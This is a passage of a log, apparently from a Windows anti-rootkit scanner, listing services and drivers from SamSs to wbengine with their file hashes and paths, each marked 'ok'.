09:28:19.0877 0x0a3c  [ 803B370865D907EA21DC0C2B6A8936B5, E98F0BA1D94786E061A3EA2CC76041FF6BE0ADF47C6205D5572C03BF0E29CA78 ] SamSs           C:\Windows\system32\lsass.exe
09:28:19.0888 0x0a3c  SamSs - ok
09:28:19.0925 0x0a3c  [ 05D860DA1040F111503AC416CCEF2BCA, DAE2F37D09A5A42F945BC8E27E4EA2303521081783A80CEE7FEE7C5A1C2CFC5E ] sbp2port        C:\Windows\system32\drivers\sbp2port.sys
09:28:19.0932 0x0a3c  sbp2port - ok
09:28:19.0968 0x0a3c  [ 8FC518FFE9519C2631D37515A68009C4, 21E10585470CF9FC3BD1977F8A426686CD2FA6BD2094B9E3594B21C7C4541D25 ] SCardSvr        C:\Windows\System32\SCardSvr.dll
09:28:19.0990 0x0a3c  SCardSvr - ok
09:28:20.0023 0x0a3c  [ 0693B5EC673E34DC147E195779A4DCF6, AF1B56FBF3ADABF94CD9DBA67586B8746DE135151F6B3D1B0EE315BC1E2DB670 ] scfilter        C:\Windows\system32\DRIVERS\scfilter.sys
09:28:20.0027 0x0a3c  scfilter - ok
09:28:20.0101 0x0a3c  [ A04BB13F8A72F8B6E8B4071723E4E336, E63287FF71C39CBF64C3347C455324C8437F9CF398153E269543588B65389502 ] Schedule        C:\Windows\system32\schedsvc.dll
09:28:20.0171 0x0a3c  Schedule - ok
09:28:20.0205 0x0a3c  [ 319C6B309773D063541D01DF8AC6F55F, 182F392FE839499D159A30A3CD04B5D0C87219930BFB1A7456880B7DA75B9820 ] SCPolicySvc     C:\Windows\System32\certprop.dll
09:28:20.0210 0x0a3c  SCPolicySvc - ok
09:28:20.0232 0x0a3c  [ 08236C4BCE5EDD0A0318A438AF28E0F7, 77727F963F63C4CEC11E7AAD5FB3836179701D512CA9436C3170B9E6A4E5F888 ] SDRSVC          C:\Windows\System32\SDRSVC.dll
09:28:20.0247 0x0a3c  SDRSVC - ok
09:28:20.0271 0x0a3c  [ 90A3935D05B494A5A39D37E71F09A677, F72733A69BC6E1A2BB91D7632FF3463C12563F60FDCC00A2CDD67FF20D479952 ] secdrv          C:\Windows\system32\drivers\secdrv.sys
09:28:20.0274 0x0a3c  secdrv - ok
09:28:20.0295 0x0a3c  [ A59B3A4442C52060CC7A85293AA3546F, 1776D6DEE51991149265AAF39E17065E301C5FA1FF4068653DC0010B9B27185D ] seclogon        C:\Windows\system32\seclogon.dll
09:28:20.0303 0x0a3c  seclogon - ok
09:28:20.0329 0x0a3c  [ DCB7FCDCC97F87360F75D77425B81737, F8289AF2C458C167038EEFE613EE5E3D6D5B3308B8784168374BC81C47891CE5 ] SENS            C:\Windows\System32\sens.dll
09:28:20.0338 0x0a3c  SENS - ok
09:28:20.0376 0x0a3c  [ 50087FE1EE447009C9CC2997B90DE53F, B5E6CF1D991F87C29C5E28198E0962E31FFB499A46C3BD43FC20391693389959 ] SensrSvc        C:\Windows\system32\sensrsvc.dll
09:28:20.0385 0x0a3c  SensrSvc - ok
09:28:20.0421 0x0a3c  [ 9AD8B8B515E3DF6ACD4212EF465DE2D1, E2F019BCD1446236D078D46065DD151DD068778F33BE2F1E8A0CC1EA2F954E86 ] Serenum         C:\Windows\system32\drivers\serenum.sys
09:28:20.0426 0x0a3c  Serenum - ok
09:28:20.0476 0x0a3c  [ 5FB7FCEA0490D821F26F39CC5EA3D1E2, A26DB2EB9F3E2509B4EBA949DB97595CC32332D9321DF68283BFC102E66D766F ] Serial          C:\Windows\system32\drivers\serial.sys
09:28:20.0483 0x0a3c  Serial - ok
09:28:20.0521 0x0a3c  [ 79BFFB520327FF916A582DFEA17AA813, 7A2A9D69BE02228591186A9F4453D4B5FD98837CA422C873C48040170E8BD18C ] sermouse        C:\Windows\system32\drivers\sermouse.sys
09:28:20.0524 0x0a3c  sermouse - ok
09:28:20.0603 0x0a3c  [ 4AE380F39A0032EAB7DD953030B26D28, C8F5F2DD59574E966FDF3057867BB959A554BAB6FD5DC6F1427094A6BC2B2809 ] SessionEnv      C:\Windows\system32\sessenv.dll
09:28:20.0616 0x0a3c  SessionEnv - ok
09:28:20.0653 0x0a3c  [ 9F976E1EB233DF46FCE808D9DEA3EB9C, 6A5C53F27F8BCA85CE206EE7D196176F67EC6FFA5D4830373A20792C149B5E75 ] sffdisk         C:\Windows\system32\drivers\sffdisk.sys
09:28:20.0656 0x0a3c  sffdisk - ok
09:28:20.0692 0x0a3c  [ 932A68EE27833CFD57C1639D375F2731, 11D6B98FBEEE2B9C7B06EF7091857BBD3B349077997D6261D66280668FD1B5C3 ] sffp_mmc        C:\Windows\system32\drivers\sffp_mmc.sys
09:28:20.0695 0x0a3c  sffp_mmc - ok
09:28:20.0716 0x0a3c  [ 6D4CCAEDC018F1CF52866BBBAA235982, AAC41F5C97B3FE5A3DC0838457EB8CC9BB71FCA16D3EDBB67D603F0A9D46C131 ] sffp_sd         C:\Windows\system32\drivers\sffp_sd.sys
09:28:20.0719 0x0a3c  sffp_sd - ok
09:28:20.0747 0x0a3c  [ DB96666CC8312EBC45032F30B007A547, C3AE60FC65A36E96E0D2CC6E184481D70F91A19DC3E2E17E2873DD670A592DD7 ] sfloppy         C:\Windows\system32\drivers\sfloppy.sys
09:28:20.0750 0x0a3c  sfloppy - ok
09:28:20.0804 0x0a3c  [ D1A079A0DE2EA524513B6930C24527A2, E2BC16DBCF38841EECD49C6FA1A9AC89C17F332F12606CA826F058E995E1B83D ] SharedAccess    C:\Windows\System32\ipnathlp.dll
09:28:20.0837 0x0a3c  SharedAccess - ok
09:28:20.0890 0x0a3c  [ 414DA952A35BF5D50192E28263B40577, 9C9BAFB9880DA6CC728506A142BE124E186219610DCC3460657A3CA93C865DF1 ] ShellHWDetection C:\Windows\System32\shsvcs.dll
09:28:20.0943 0x0a3c  ShellHWDetection - ok
09:28:20.0991 0x0a3c  [ 2565CAC0DC9FE0371BDCE60832582B2E, 1A775214E86B83C2F1799F12D71077D81C89AD32734A248BA88787B7F104B79D ] sisagp          C:\Windows\system32\drivers\sisagp.sys
09:28:20.0995 0x0a3c  sisagp - ok
09:28:21.0038 0x0a3c  [ A9F0486851BECB6DDA1D89D381E71055, 7E909538AB758C18AC2CCBFFEE17BA36FA6ED2E674AA70924AA87AC61375FF35 ] SiSRaid2        C:\Windows\system32\drivers\SiSRaid2.sys
09:28:21.0042 0x0a3c  SiSRaid2 - ok
09:28:21.0059 0x0a3c  [ 3727097B55738E2F554972C3BE5BC1AA, 75D52A596A298C33EC79A3B0B80F25492C08A182ABC679401502DA9597687566 ] SiSRaid4        C:\Windows\system32\drivers\sisraid4.sys
09:28:21.0066 0x0a3c  SiSRaid4 - ok
09:28:21.0114 0x0a3c  [ 3E21C083B8A01CB70BA1F09303010FCE, 803F8F91299C387110F34A49340E7136AAE91B418E2977A36285EA8F432FF197 ] Smb             C:\Windows\system32\DRIVERS\smb.sys
09:28:21.0120 0x0a3c  Smb - ok
09:28:21.0195 0x0a3c  [ 6A984831644ECA1A33FFEAE4126F4F37, 753E23D2B33D47C52C05D892B052CFD96D93B97FB6E9FCB58EF1E4C4A125BF78 ] SNMPTRAP        C:\Windows\System32\snmptrap.exe
09:28:21.0203 0x0a3c  SNMPTRAP - ok
09:28:21.0227 0x0a3c  [ 95CF1AE7527FB70F7816563CBC09D942, CE8BACB91A5A86CBCE82619C6C1873B4D7593B00CED3B522E41B8F7F6258CC65 ] spldr           C:\Windows\system32\drivers\spldr.sys
09:28:21.0230 0x0a3c  spldr - ok
09:28:21.0287 0x0a3c  [ 9AEA093B8F9C37CF45538382CABA2475, CC63239C412067AA72318ADB8BB80BCDF2CA60DA05D814D32753C92508BC16A8 ] Spooler         C:\Windows\System32\spoolsv.exe
09:28:21.0332 0x0a3c  Spooler - ok
09:28:21.0555 0x0a3c  [ CF87A1DE791347E75B98885214CED2B8, 7AF4E03D751C951A4E5FBA28200DABFE6B3BF055490163EEEEA84EBA4D0F368A ] sppsvc          C:\Windows\system32\sppsvc.exe
09:28:21.0756 0x0a3c  sppsvc - ok
09:28:21.0802 0x0a3c  [ B0180B20B065D89232A78A40FE56EAA6, 4D045B23AD58A8822BE9F20119744A8D47455469D54494745CEB099951DA60FF ] sppuinotify     C:\Windows\system32\sppuinotify.dll
09:28:21.0813 0x0a3c  sppuinotify - ok
09:28:21.0866 0x0a3c  [ EB392D7D973E7B5F1D5CB0F8CF369294, E5019255D23A3E8ECE0D3F4BF83182CAA908B21BB733B7EC5C96062FF371497E ] SPT4700DR       C:\Windows\system32\drivers\SPT4700DR.sys
09:28:21.0925 0x0a3c  SPT4700DR - ok
09:28:21.0976 0x0a3c  [ AA73986098DF80FDE1703913EEB1C66E, 562431AA94C629041C1133094C370228D68FBF815762B31C1F1EA02BA4B47B07 ] SQLAgent$ISSSQL C:\Program Files\Microsoft SQL Server\MSSQL10_50.ISSSQL\MSSQL\Binn\SQLAGENT.EXE
09:28:22.0021 0x0a3c  SQLAgent$ISSSQL - ok
09:28:22.0100 0x0a3c  [ 1B42A219690645CE735F1F4B97A84B8E, EE5918B9492FC8DA275232F90C923CADEDC38486E7DA142157EEB8EE759091B1 ] SQLBrowser      C:\Program Files\Microsoft SQL Server\90\Shared\sqlbrowser.exe
09:28:22.0122 0x0a3c  SQLBrowser - ok
09:28:22.0148 0x0a3c  [ 8E6E5CFA06769A417B03FD6FAA29E010, CFF4FF34C2E0D9DFB502FCDB99DF4A21D0DBC335B6AD46805DAB069E789ECF9E ] SQLWriter       C:\Program Files\Microsoft SQL Server\90\Shared\sqlwriter.exe
09:28:22.0155 0x0a3c  SQLWriter - ok
09:28:22.0210 0x0a3c  [ E4C2764065D66EA1D2D3EBC28FE99C46, 043AEF06A23069DD17675955C834690A5FD8F1948A05B3969F977E823C4E25F5 ] srv             C:\Windows\system32\DRIVERS\srv.sys
09:28:22.0234 0x0a3c  srv - ok
09:28:22.0277 0x0a3c  [ 03F0545BD8D4C77FA0AE1CEEDFCC71AB, 4DF31206DF8F33C2975E23C7257ED930C4EDA8BC4E246D8FDA130BB583083ED0 ] srv2            C:\Windows\system32\DRIVERS\srv2.sys
09:28:22.0306 0x0a3c  srv2 - ok
09:28:22.0335 0x0a3c  [ BE6BD660CAA6F291AE06A718A4FA8ABC, CD38939CFBA80B882D38099194FC1EBAE15A9D27A4D941DD03C55EC745E52E59 ] srvnet          C:\Windows\system32\DRIVERS\srvnet.sys
09:28:22.0342 0x0a3c  srvnet - ok
09:28:22.0387 0x0a3c  [ D887C9FD02AC9FA880F6E5027A43E118, F38BAD90EC791368C37C21090302708D2DFB83ECE9096609AD9AA667B2E5592E ] SSDPSRV         C:\Windows\System32\ssdpsrv.dll
09:28:22.0408 0x0a3c  SSDPSRV - ok
09:28:22.0442 0x0a3c  [ D318F23BE45D5E3A107469EB64815B50, D74355E6FF215AA8CE53BC9DF16AF2740F2FC2FD754939478A3608BDA8C6DDA0 ] SstpSvc         C:\Windows\system32\sstpsvc.dll
09:28:22.0454 0x0a3c  SstpSvc - ok
09:28:22.0471 0x0a3c  [ DB32D325C192B801DF274BFD12A7E72B, F089DBA719E22BC269720A6B840B873A4AF5639745DB0C3DBC8BD2F2839A1ABA ] stexstor        C:\Windows\system32\drivers\stexstor.sys
09:28:22.0475 0x0a3c  stexstor - ok
09:28:22.0522 0x0a3c  [ E1FB3706030FB4578A0D72C2FC3689E4, A62EC9AA4514CAF2A10C0A3AEF7A36F593A7E7DA370A3F130C24E1B612E19427 ] StiSvc          C:\Windows\System32\wiaservc.dll
09:28:22.0569 0x0a3c  StiSvc - ok
09:28:22.0612 0x0a3c  [ 472AF0311073DCECEAA8FA18BA2BDF89, 089414057EB2047E42C96C1ACE79D509967461DC5A4D2836F63C04268637A3FC ] storflt         C:\Windows\system32\drivers\vmstorfl.sys
09:28:22.0616 0x0a3c  storflt - ok
09:28:22.0647 0x0a3c  [ 0BF669F0A910BEDA4A32258D363AF2A5, 83EEBACDE4F69A2866B69CAA633F5C8B3CB01D88CEDB01B6EA5988E0A25CEE47 ] StorSvc         C:\Windows\system32\storsvc.dll
09:28:22.0655 0x0a3c  StorSvc - ok
09:28:22.0695 0x0a3c  [ DCAFFD62259E0BDB433DD67B5BB37619, CBD12FF9BBF33D18B0F3D322B12EC62E7DF3BF45C6AD43D2E91FF4C4762E05D0 ] storvsc         C:\Windows\system32\drivers\storvsc.sys
09:28:22.0698 0x0a3c  storvsc - ok
09:28:22.0732 0x0a3c  [ E58C78A848ADD9610A4DB6D214AF5224, 1575A90EB22A4FB066459BDA00C6CAC10198C3C8C74493721EC6D34B51F50426 ] swenum          C:\Windows\system32\drivers\swenum.sys
09:28:22.0735 0x0a3c  swenum - ok
09:28:22.0777 0x0a3c  [ A28BD92DF340E57B024BA433165D34D7, 889CC7FF143C3549982128473FF927CD80CF36485A347EF399C1271C8CE12CE4 ] swprv           C:\Windows\System32\swprv.dll
09:28:22.0822 0x0a3c  swprv - ok
09:28:22.0913 0x0a3c  [ 36650D618CA34C9D357DFD3D89B2C56F, 7C3774E53DCF32CB3A4B3504E32D2A651E18467FA0A6AC4C7993C696741B704B ] SysMain         C:\Windows\system32\sysmain.dll
09:28:22.0994 0x0a3c  SysMain - ok
09:28:23.0054 0x0a3c  [ 763FECDC3D30C815FE72DD57936C6CD1, 1A62C7E63E426D56894F4121C75D9C60FC9A14469ADBD0D6F0B94B8DE48CDA3E ] TabletInputService C:\Windows\System32\TabSvc.dll
09:28:23.0065 0x0a3c  TabletInputService - ok
09:28:23.0102 0x0a3c  [ 613BF4820361543956909043A265C6AC, FCFF02E466D2501630B452627FB218C01E5245A0921EE3D2117E7FD63AC7E98E ] TapiSrv         C:\Windows\System32\tapisrv.dll
09:28:23.0136 0x0a3c  TapiSrv - ok
09:28:23.0158 0x0a3c  [ B799D9FDB26111737F58288D8DC172D9, 409A60819A4305699E2E492A6190637FAAEBD19E745A5DB2A5D6977106C86591 ] TBS             C:\Windows\System32\tbssvc.dll
09:28:23.0169 0x0a3c  TBS - ok
09:28:23.0266 0x0a3c  [ CA59F7C570AF70BC174F477CFE2D9EE3, F09E4E14207A2AC6957D2C0AC8707D0E356A9087FA6DC703373242D8EEB026BD ] Tcpip           C:\Windows\system32\drivers\tcpip.sys
09:28:23.0346 0x0a3c  Tcpip - ok
09:28:23.0434 0x0a3c  [ CA59F7C570AF70BC174F477CFE2D9EE3, F09E4E14207A2AC6957D2C0AC8707D0E356A9087FA6DC703373242D8EEB026BD ] TCPIP6          C:\Windows\system32\DRIVERS\tcpip.sys
09:28:23.0495 0x0a3c  TCPIP6 - ok
09:28:23.0548 0x0a3c  [ 3EEBD3BD93DA46A26E89893C7AB2FF3B, 2C7204DCD2BCBC6A250FF0F6477616F327AF41FDB7CABE69E5C357361009FB4E ] tcpipreg        C:\Windows\system32\drivers\tcpipreg.sys
09:28:23.0552 0x0a3c  tcpipreg - ok
09:28:23.0594 0x0a3c  [ 1CB91B2BD8F6DD367DFC2EF26FD751B2, 879E2827354BB21573AC6A7CCEB746D44214540687E6882FFCB4089546FBD954 ] TDPIPE          C:\Windows\system32\drivers\tdpipe.sys
09:28:23.0597 0x0a3c  TDPIPE - ok
09:28:23.0634 0x0a3c  [ 2C2C5AFE7EE4F620D69C23C0617651A8, E828D974C3F9D7004A030C3AD448096C736FDB4C4C1707D043E567D08C845103 ] TDTCP           C:\Windows\system32\drivers\tdtcp.sys
09:28:23.0638 0x0a3c  TDTCP - ok
09:28:23.0663 0x0a3c  [ B459575348C20E8121D6039DA063C704, 1B4328A9EA39FF5A57F258E02254D04B73455F1DF7C997C13702A8B2F12D0347 ] tdx             C:\Windows\system32\DRIVERS\tdx.sys
09:28:23.0669 0x0a3c  tdx - ok
09:28:23.0696 0x0a3c  [ 04DBF4B01EA4BF25A9A3E84AFFAC9B20, 0D81B427720637882077C5024D738191F858FC734ED040697872D906351EF663 ] TermDD          C:\Windows\system32\drivers\termdd.sys
09:28:23.0703 0x0a3c  TermDD - ok
09:28:23.0774 0x0a3c  [ 382C804C92811BE57829D8E550A900E2, 5F52C2E7902024CF1C9CC0069F411C3F19CCA3DB209F437FA0F3932D4898EB50 ] TermService     C:\Windows\System32\termsrv.dll
09:28:23.0820 0x0a3c  TermService - ok
09:28:23.0845 0x0a3c  [ 42FB6AFD6B79D9FE07381609172E7CA4, B57C85091209A2FAD19ED490B8FA7FC98F12911F9C9CACE9AF1E540780CE6700 ] Themes          C:\Windows\system32\themeservice.dll
09:28:23.0855 0x0a3c  Themes - ok
09:28:23.0880 0x0a3c  [ 146B6F43A673379A3C670E86D89BE5EA, C4412DCF80DE6B55466F399413271364F14BC0819C224AA161EDDC31A9775440 ] THREADORDER     C:\Windows\system32\mmcss.dll
09:28:23.0888 0x0a3c  THREADORDER - ok
09:28:23.0929 0x0a3c  [ 4792C0378DB99A9BC2AE2DE6CFFF0C3A, 532A3A812578B2DFD83001DE66FC73689D79EC729409EB572E07E6D65B281712 ] TrkWks          C:\Windows\System32\trkwks.dll
09:28:23.0940 0x0a3c  TrkWks - ok
09:28:23.0991 0x0a3c  [ 2C49B175AEE1D4364B91B531417FE583, 6C7995E18F84E465C376D1D5F153C15ACB66CDEA86EE5BF186677F572E7E129B ] TrustedInstaller C:\Windows\servicing\TrustedInstaller.exe
09:28:24.0002 0x0a3c  TrustedInstaller - ok
09:28:24.0033 0x0a3c  [ B37B08F2E5EEB1A37E448E09BACE1101, 32CC9E06B88BAB6FAB4696B744548DFCE9199A7FD2BA8B019F269CA75895852C ] tssecsrv        C:\Windows\system32\DRIVERS\tssecsrv.sys
09:28:24.0037 0x0a3c  tssecsrv - ok
09:28:24.0062 0x0a3c  [ C6A5FBD4977305E1FA23E02C042DB463, A6EB5E4B8051A258D40A385609E930318EAA3494C8466F48542B806FE6A7C47A ] TsUsbFlt        C:\Windows\system32\drivers\tsusbflt.sys
09:28:24.0121 0x0a3c  TsUsbFlt - ok
09:28:24.0151 0x0a3c  [ 57C527AF84748B5C2F5178C499C0B81F, 2FF1F25BA16F8984E9F2CE4DE663F261BAF267EDF10D466A52BB211C567F763C ] TsUsbGD         C:\Windows\system32\drivers\TsUsbGD.sys
09:28:24.0155 0x0a3c  TsUsbGD - ok
09:28:24.0214 0x0a3c  [ B2FA25D9B17A68BB93D58B0556E8C90D, 0146931B733CAB1CD87F94C35F97E110D6ED6C55EAFF03345400A29AEDE99BDE ] tunnel          C:\Windows\system32\DRIVERS\tunnel.sys
09:28:24.0221 0x0a3c  tunnel - ok
09:28:24.0244 0x0a3c  [ 750FBCB269F4D7DD2E420C56B795DB6D, E1A95C59148FE463539C34336FD0E74B31A33B8AB2B8E34AA10349C3347471D7 ] uagp35          C:\Windows\system32\drivers\uagp35.sys
09:28:24.0248 0x0a3c  uagp35 - ok
09:28:24.0288 0x0a3c  [ EE43346C7E4B5E63E54F927BABBB32FF, BAD6FC3BEE45E644D5A6A0A31428F5B2AEC72A0AA0C74EF8177B1FE23EEF3AA9 ] udfs            C:\Windows\system32\DRIVERS\udfs.sys
09:28:24.0309 0x0a3c  udfs - ok
09:28:24.0351 0x0a3c  [ 8344FD4FCE927880AA1AA7681D4927E5, 1B54EFA60A221E2B9FFE59BB41C7E7D8B5AC6826F1C5577456D81371D464255A ] UI0Detect       C:\Windows\system32\UI0Detect.exe
09:28:24.0361 0x0a3c  UI0Detect - ok
09:28:24.0413 0x0a3c  [ 44E8048ACE47BEFBFDC2E9BE4CBC8880, 5D96D90FDF68AE470CC92CA9DF9DA2C05A53EF455A5A109DBBF7C96F3238257C ] uliagpkx        C:\Windows\system32\drivers\uliagpkx.sys
09:28:24.0418 0x0a3c  uliagpkx - ok
09:28:24.0454 0x0a3c  [ D295BED4B898F0FD999FCFA9B32B071B, D4130DB4AE76EE6DC0B8E7A4FEF5CB8B26EBD822C21021F6FA78FD29C1E211C2 ] umbus           C:\Windows\system32\DRIVERS\umbus.sys
09:28:24.0459 0x0a3c  umbus - ok
09:28:24.0497 0x0a3c  [ 7550AD0C6998BA1CB4843E920EE0FEAC, 24C001E422C3B3B920CDCF6003A3179CE464DE4284775403DD5122EF9780460D ] UmPass          C:\Windows\system32\drivers\umpass.sys
09:28:24.0500 0x0a3c  UmPass - ok
09:28:24.0543 0x0a3c  [ 409994A8EACEEE4E328749C0353527A0, FFC57B647147DE2957A7DE4B330CC534DE7AC892A2FCE3BB164F7A516CAB1B56 ] UmRdpService    C:\Windows\System32\umrdp.dll
09:28:24.0577 0x0a3c  UmRdpService - ok
09:28:24.0615 0x0a3c  [ 833FBB672460EFCE8011D262175FAD33, C0C3067A305993CBF056C229771CB0593DD60C9C7AC5130FF1CA610BCA812AB5 ] upnphost        C:\Windows\System32\upnphost.dll
09:28:24.0660 0x0a3c  upnphost - ok
09:28:24.0706 0x0a3c  [ 0803FBA9FE829D61AE26EC0BCC910C46, 30D00E2C7DFC630C99C1599587D4F9C272BC30D444E07C961AA05BF84587806B ] usbccgp         C:\Windows\system32\DRIVERS\usbccgp.sys
09:28:24.0713 0x0a3c  usbccgp - ok
09:28:24.0749 0x0a3c  [ 2352AB5F9F8F097BF9D41D5A4718A041, 25BC7828C625B9B2A5110C25B230C5828CEC18EC97ECF9EC4745E8930CBF472C ] usbcir          C:\Windows\system32\drivers\usbcir.sys
09:28:24.0755 0x0a3c  usbcir - ok
09:28:24.0788 0x0a3c  [ D40855F89B69305140BBD7E9A3BA2DA6, 745DC6D770666F6B19C2B6AA89C21D1A314732E291453BFA2367F9AF86F97C3C ] usbehci         C:\Windows\system32\drivers\usbehci.sys
09:28:24.0793 0x0a3c  usbehci - ok
09:28:24.0845 0x0a3c  [ EDF2DF71C4F1E13A6AC75F5224DE655A, 1764D155C6B99201774B57195349304259232A12868ECFC2069CA49443EBDC2C ] usbhub          C:\Windows\system32\DRIVERS\usbhub.sys
09:28:24.0867 0x0a3c  usbhub - ok
09:28:24.0898 0x0a3c  [ 9828C8D14CC2676421778F0DE638CF97, 479A28211FFB85190A01FAB0283B927588805D2C0CDB03F85F8F814B88E4F453 ] usbohci         C:\Windows\system32\drivers\usbohci.sys
09:28:24.0901 0x0a3c  usbohci - ok
09:28:24.0928 0x0a3c  [ 797D862FE0875E75C7CC4C1AD7B30252, 1BBE745E4C85F8911076F6032ACD7A35FAC048D3CB1500C64E08D8B2C70A1069 ] usbprint        C:\Windows\system32\drivers\usbprint.sys
09:28:24.0931 0x0a3c  usbprint - ok
09:28:24.0962 0x0a3c  [ F991AB9CC6B908DB552166768176896A, AD8E7A16B23B244B7F834622D4E38B5844193C6E31EF96F61E0E2EA16C945026 ] USBSTOR         C:\Windows\system32\DRIVERS\USBSTOR.SYS
09:28:24.0968 0x0a3c  USBSTOR - ok
09:28:25.0002 0x0a3c  [ 800AABFD625EEFF899F7E5496BDE37AB, 3EB7ED07760CB348FCA9A06C2B838EF79B51A83C5F70A9C9EAAEAE54480067E2 ] usbuhci         C:\Windows\system32\drivers\usbuhci.sys
09:28:25.0006 0x0a3c  usbuhci - ok
09:28:25.0037 0x0a3c  [ 081E6E1C91AEC36758902A9F727CD23C, 9FDAA17A3B99067E035E5D76305427F15FFDBC5D304B2BB78AFC6463EDDE1A75 ] UxSms           C:\Windows\System32\uxsms.dll
09:28:25.0047 0x0a3c  UxSms - ok
09:28:25.0068 0x0a3c  [ 803B370865D907EA21DC0C2B6A8936B5, E98F0BA1D94786E061A3EA2CC76041FF6BE0ADF47C6205D5572C03BF0E29CA78 ] VaultSvc        C:\Windows\system32\lsass.exe
09:28:25.0073 0x0a3c  VaultSvc - ok
09:28:25.0111 0x0a3c  [ A059C4C3EDB09E07D21A8E5C0AABD3CB, BDD3729B49DF2E2FC72FFEF9D10235B481A671DE5A721B6B9A80873B7A343F07 ] vdrvroot        C:\Windows\system32\drivers\vdrvroot.sys
09:28:25.0114 0x0a3c  vdrvroot - ok
09:28:25.0168 0x0a3c  [ C3CD30495687C2A2F66A65CA6FD89BE9, 582E4706C1D6A151020D14B26C7BF166F4E42BDD6E410F30EC452469270C5E9B ] vds             C:\Windows\System32\vds.exe
09:28:25.0215 0x0a3c  vds - ok
09:28:25.0248 0x0a3c  [ 17C408214EA61696CEC9C66E388B14F3, 829C0416672E2B2DFABCFE641E7F281F41E8DBB3C0EF11C7784CB9BB94F87E97 ] vga             C:\Windows\system32\DRIVERS\vgapnp.sys
09:28:25.0251 0x0a3c  vga - ok
09:28:25.0286 0x0a3c  [ 8E38096AD5C8570A6F1570A61E251561, 4DBA3C1397A2203548F45F006E66D99F837903F601ABBCE2304754F783CA8A39 ] VgaSave         C:\Windows\System32\drivers\vga.sys
09:28:25.0290 0x0a3c  VgaSave - ok
09:28:25.0324 0x0a3c  [ 5461686CCA2FDA57B024547733AB42E3, 2721D0659AA890172FCAD4EC4D926B58ACD0EE4887DA51545DC7237420D5BF84 ] vhdmp           C:\Windows\system32\drivers\vhdmp.sys
09:28:25.0334 0x0a3c  vhdmp - ok
09:28:25.0376 0x0a3c  [ C829317A37B4BEA8F39735D4B076E923, 55D1796AE750071E1E05BD7702B6C355CCFFE27B4C00E93E7044C3184732B497 ] viaagp          C:\Windows\system32\drivers\viaagp.sys
09:28:25.0381 0x0a3c  viaagp - ok
09:28:25.0426 0x0a3c  [ E02F079A6AA107F06B16549C6E5C7B74, B530DCE3EE4F285B3D5F69F7148D17E016D54F04E6F93706B829A34567748788 ] ViaC7           C:\Windows\system32\drivers\viac7.sys
09:28:25.0431 0x0a3c  ViaC7 - ok
09:28:25.0471 0x0a3c  [ E43574F6A56A0EE11809B48C09E4FD3C, 3687BF638E21C00E62ABFED70D728B91ADA08F7164CA898E654F31DA196589E9 ] viaide          C:\Windows\system32\drivers\viaide.sys
09:28:25.0475 0x0a3c  viaide - ok
09:28:25.0513 0x0a3c  [ C2F2911156FDC7817C52829C86DA494E, FE499F189B5016FCE0018AA3DE3970B72275B7B15F3D4D608117F6DDEC6B90DC ] vmbus           C:\Windows\system32\drivers\vmbus.sys
09:28:25.0524 0x0a3c  vmbus - ok
09:28:25.0555 0x0a3c  [ D4D77455211E204F370D08F4963063CE, 2018B2A84C73E0834200A594C02A9D28C74906F126DAD3CCDDFC9CD9A61669E2 ] VMBusHID        C:\Windows\system32\drivers\VMBusHID.sys
09:28:25.0558 0x0a3c  VMBusHID - ok
09:28:25.0594 0x0a3c  [ 4C63E00F2F4B5F86AB48A58CD990F212, 9796BD4B9CFEEEAF57C5E332A732EFC2770B21F9B35301A5D202F5FC52C1E035 ] volmgr          C:\Windows\system32\drivers\volmgr.sys
09:28:25.0598 0x0a3c  volmgr - ok
09:28:25.0645 0x0a3c  [ B5BB72067DDDDBBFB04B2F89FF8C3C87, 65B9AD55F43940A5FDD88B6EC5034A7E375DF8E6F5F1AE6519A4BD6B7E992EBC ] volmgrx         C:\Windows\system32\drivers\volmgrx.sys
09:28:25.0667 0x0a3c  volmgrx - ok
09:28:25.0719 0x0a3c  [ F497F67932C6FA693D7DE2780631CFE7, DAE544ED99D2CF570DA31343BD87D2F856D0D13529656D38E1BF854C77F017F6 ] volsnap         C:\Windows\system32\drivers\volsnap.sys
09:28:25.0740 0x0a3c  volsnap - ok
09:28:25.0793 0x0a3c  [ 9DFA0CC2F8855A04816729651175B631, 37FD9E43A2A3F125E94A315FB4CD8A1B5499A5FD74806EB2D1E5DA88C070D3A3 ] vsmraid         C:\Windows\system32\drivers\vsmraid.sys
09:28:25.0802 0x0a3c  vsmraid - ok
09:28:25.0896 0x0a3c  [ 209A3B1901B83AEB8527ED211CCE9E4C, 1A431F6409F8E0531F600F8F988ECECECB902DA26BBAAF1DE74A5CAC29A7CB44 ] VSS             C:\Windows\system32\vssvc.exe
09:28:25.0967 0x0a3c  VSS - ok
09:28:26.0006 0x0a3c  [ 90567B1E658001E79D7C8BBD3DDE5AA6, EFC23BEEA7F54A2DC56CB523DAD1AF0358D904C5278BF08873910E2DB3F13557 ] vwifibus        C:\Windows\System32\drivers\vwifibus.sys
09:28:26.0010 0x0a3c  vwifibus - ok
09:28:26.0052 0x0a3c  [ 55187FD710E27D5095D10A472C8BAF1C, AE298E2D3BA366BCBDC092C717214C181E8843FA564A6DFB07FC3238A5A68DC3 ] W32Time         C:\Windows\system32\w32time.dll
09:28:26.0097 0x0a3c  W32Time - ok
09:28:26.0126 0x0a3c  [ DE3721E89C653AA281428C8A69745D90, 501C78056ED4295625D8A5412025FD2F0CA24077044D3A5800BA79DF3D946516 ] WacomPen        C:\Windows\system32\drivers\wacompen.sys
09:28:26.0129 0x0a3c  WacomPen - ok
09:28:26.0167 0x0a3c  [ 3C3C78515F5AB448B022BDF5B8FFDD2E, 35284174A42039C3C1FF8A3C8BC187A5E067C7782FC62D19749C2CB28C4E36C7 ] WANARP          C:\Windows\system32\DRIVERS\wanarp.sys
09:28:26.0172 0x0a3c  WANARP - ok
09:28:26.0199 0x0a3c  [ 3C3C78515F5AB448B022BDF5B8FFDD2E, 35284174A42039C3C1FF8A3C8BC187A5E067C7782FC62D19749C2CB28C4E36C7 ] Wanarpv6        C:\Windows\system32\DRIVERS\wanarp.sys
09:28:26.0203 0x0a3c  Wanarpv6 - ok
09:28:26.0327 0x0a3c  [ 353A04C273EC58475D8633E75CCD5604, FFAE53B6B53AEFC9E8A10BF27480E072D74430276BEB532FE1D473E9616D8CE0 ] WatAdminSvc     C:\Windows\system32\Wat\WatAdminSvc.exe
09:28:26.0407 0x0a3c  WatAdminSvc - ok
09:28:26.0509 0x0a3c  [ 691E3285E53DCA558E1A84667F13E15A, 12EDB66EF8FC100402BEA221F354D3BD5542F6DDF715B6E7D873D6BAE7E3D329 ] wbengine        C:\Windows\system32\wbengine.exe
09:28:26.0586 0x0a3c  wbengine - ok
